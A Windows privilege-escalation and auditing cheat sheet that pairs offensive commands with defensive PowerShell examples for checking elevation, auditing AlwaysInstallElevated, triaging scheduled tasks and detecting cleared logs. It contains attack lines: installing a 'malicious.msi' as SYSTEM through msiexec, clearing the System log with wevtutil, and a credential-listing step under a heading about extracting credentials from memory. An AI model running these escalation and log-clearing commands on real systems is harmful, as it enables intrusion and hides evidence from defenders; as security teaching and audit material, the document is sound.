1. User & Permission Enumeration
1) Check current user identity
whoami
2) Check user privileges
whoami /priv
3) List all local users on the system
Get-LocalUser
4) Check what groups your user belongs to
whoami /groups
2. Finding Privilege Escalation Opportunities
1) Check if PowerShell is running as an Administrator
[System.Security.Principal.WindowsIdentity]::GetCurrent().Groups -contains "S-1-5-32-544"
- If True, then you're an Administrator!
- Try relaunching PowerShell with administrator rights
Start-Process powershell -Verb runAs
- If a UAC prompt appears, you don't have full admin privileges yet.
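One caveat worth knowing before trusting the SID check above: with UAC enabled, an administrator's normal (filtered) token still lists S-1-5-32-544 in .Groups, only marked deny-only, so the -contains test can report True from a shell that is not actually elevated. The following added example (not part of the original cheat sheet) uses WindowsPrincipal.IsInRole, which answers the question the cheat sheet is really asking: does this token currently grant Administrators rights?

```powershell
# Added example: tell "member of Administrators" apart from "running elevated".
$identity  = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$principal = [System.Security.Principal.WindowsPrincipal]::new($identity)
$adminRole = [System.Security.Principal.WindowsBuiltInRole]::Administrator

# True only when the current token actually carries Administrators privileges
$isElevated = $principal.IsInRole($adminRole)

# Group membership as recorded on the token (present but deny-only under UAC)
$adminSid = [System.Security.Principal.SecurityIdentifier]'S-1-5-32-544'
$isMember = $identity.Groups -contains $adminSid

[PSCustomObject]@{
    User            = $identity.Name
    MemberOfAdmins  = $isMember
    RunningElevated = $isElevated
}

if ($isMember -and -not $isElevated) {
    Write-Host 'Admin account, but this shell holds a filtered token; UAC is doing its job.'
}
```

MemberOfAdmins = True with RunningElevated = False is the normal state for an admin user in a non-elevated prompt, which is exactly the case the plain -contains check cannot distinguish.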
3. UAC Bypass & Privilege Escalation
- UAC: Windows User Account Control
1) Check if UAC is enabled
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA
- output:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
EnableLUA REG_DWORD 0x1
- 0x1 (Enabled): UAC is on, bypassing might be required
- 0x0 (Disabled): You already have admin rights.
2) Check for AlwaysInstallElevated Policy
- This setting allows any MSI installer to run with full system privileges
reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
- output:
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1
- If both return 0x1, you can escalate privileges by running an MSI installer as SYSTEM!
msiexec /quiet /qn /i malicious.msi
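The two reg query checks above are the ones an auditor runs as well, from the other side. The following added example (not from the original cheat sheet) reads the same three values from PowerShell, treats a missing AlwaysInstallElevated value as not set (both HKCU and HKLM must be 1 for the Installer to elevate), and prints the remediation without applying it. Get-RegDword is a helper defined here, not a built-in cmdlet.

```powershell
# Added example: audit EnableLUA and AlwaysInstallElevated; read-only.
function Get-RegDword {
    param([string]$Path, [string]$Name)
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }   # key or value absent: policy not configured
    return [int]$item.$Name
}

$enableLua = Get-RegDword 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' 'EnableLUA'
$aieHkcu   = Get-RegDword 'HKCU:\Software\Policies\Microsoft\Windows\Installer' 'AlwaysInstallElevated'
$aieHklm   = Get-RegDword 'HKLM:\Software\Policies\Microsoft\Windows\Installer' 'AlwaysInstallElevated'

$findings = @()
if ($enableLua -eq 0) {
    $findings += 'UAC disabled (EnableLUA=0): Administrators get a full token with no prompt.'
}
# Both values must be 1; a missing value behaves like 0.
if ($aieHkcu -eq 1 -and $aieHklm -eq 1) {
    $findings += 'AlwaysInstallElevated set in HKCU and HKLM: any user-supplied MSI installs as SYSTEM.'
}

[PSCustomObject]@{
    EnableLUA                  = $enableLua
    AlwaysInstallElevated_HKCU = $aieHkcu
    AlwaysInstallElevated_HKLM = $aieHklm
    Findings                   = if ($findings) { $findings -join ' ' } else { 'No issues found.' }
}

# Remediation (needs an elevated shell; uncomment to apply):
# Set-ItemProperty 'HKLM:\Software\Policies\Microsoft\Windows\Installer' AlwaysInstallElevated 0
# Set-ItemProperty 'HKCU:\Software\Policies\Microsoft\Windows\Installer' AlwaysInstallElevated 0
# Set-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' EnableLUA 1
```

Because the HKCU half is per-user, the same host can report the misconfiguration for one account and not another; run the audit in the context of the account you are assessing.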
4. Extracting Credentials from Memory
1) List the credentials stored in the Windows Vault (cmdkey shows targets and user names, not the secrets themselves)
cmdkey /list
5. Checking Scheduled Tasks & Persistence
1) List all scheduled tasks
schtasks /query /fo LIST /v
2) Delete a suspicious task
schtasks /delete /tn "Backdoor" /f
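schtasks /v prints everything; the hard part is spotting the one task that matters. The following added example (not from the original cheat sheet) does the triage from PowerShell: it skips the \Microsoft\ task tree, resolves each action's executable, and flags tasks that run with the highest privileges or as SYSTEM from a path outside Program Files or the Windows directory, the usual shape of persistence planted by a user-level foothold. It is read-only; $trusted is a list chosen here, not a Windows setting.

```powershell
# Added example: flag elevated, non-Microsoft scheduled tasks running from unusual paths.
$trusted = @("$env:ProgramFiles", "${env:ProgramFiles(x86)}", "$env:SystemRoot")

Get-ScheduledTask |
    Where-Object { $_.TaskPath -notlike '\Microsoft\*' } |
    ForEach-Object {
        $task = $_
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }   # COM-handler actions have no Execute
            $exe = [Environment]::ExpandEnvironmentVariables($action.Execute).Trim('"')

            $inTrusted = $false
            foreach ($root in $trusted) {
                if ($root -and $exe.StartsWith($root, 'OrdinalIgnoreCase')) { $inTrusted = $true }
            }

            $elevated = ($task.Principal.RunLevel -eq 'Highest') -or
                        ($task.Principal.UserId -in 'SYSTEM', 'NT AUTHORITY\SYSTEM')

            [PSCustomObject]@{
                Task      = "$($task.TaskPath)$($task.TaskName)"
                RunsAs    = $task.Principal.UserId
                RunLevel  = $task.Principal.RunLevel
                Execute   = $exe
                Arguments = $action.Arguments
                Suspect   = ($elevated -and -not $inTrusted)
            }
        }
    } |
    Sort-Object Suspect -Descending |
    Format-Table -AutoSize
```

A Suspect = True row is a lead, not a verdict: confirm the binary's signature and who can write to its directory before deleting the task with the schtasks /delete command above.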
6. Windows Event Logs
1) View the 10 newest Security log events (Get-EventLog reads only the classic logs)
Get-EventLog -LogName Security -Newest 10
2) Clear event logs
wevtutil cl System
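Two things the commands above do not show. First, PowerShell execution is recorded in the Microsoft-Windows-PowerShell/Operational channel, not the Security log, and Get-EventLog cannot read that channel (it is also absent from PowerShell 7). Second, clearing a log is itself logged: the Security log records a 1102 when it is cleared, and other logs leave a 104 in the System log. The following added example (not from the original cheat sheet) uses Get-WinEvent for both; 4104 script block events are complete only when script block logging is enabled by policy.

```powershell
# Added example: recent script blocks and evidence of cleared logs, via Get-WinEvent.

# 1. Most recent script blocks executed through PowerShell (Event ID 4104)
$scriptBlocks = Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-PowerShell/Operational'
    Id      = 4104
} -MaxEvents 10 -ErrorAction SilentlyContinue

$scriptBlocks | ForEach-Object {
    [PSCustomObject]@{
        Time   = $_.TimeCreated
        User   = $_.UserId
        # Properties[2] holds the ScriptBlockText for 4104; show its first line
        Script = ($_.Properties[2].Value -split "`n")[0]
    }
} | Format-Table -AutoSize

# 2. Log-clear events: the trace that wevtutil cl leaves behind
$cleared = @(
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 1102 } -MaxEvents 5 -ErrorAction SilentlyContinue
    Get-WinEvent -FilterHashtable @{ LogName = 'System';   Id = 104  } -MaxEvents 5 -ErrorAction SilentlyContinue
)

$cleared |
    Select-Object TimeCreated, LogName, Id,
        @{ n = 'Message'; e = { ($_.Message -split "`n")[0] } } |
    Format-Table -AutoSize
```

Reading the Security log requires an elevated shell; the other two channels are readable from a standard prompt. Forwarding these channels off the host is what keeps the 1102/104 evidence available after a local clear.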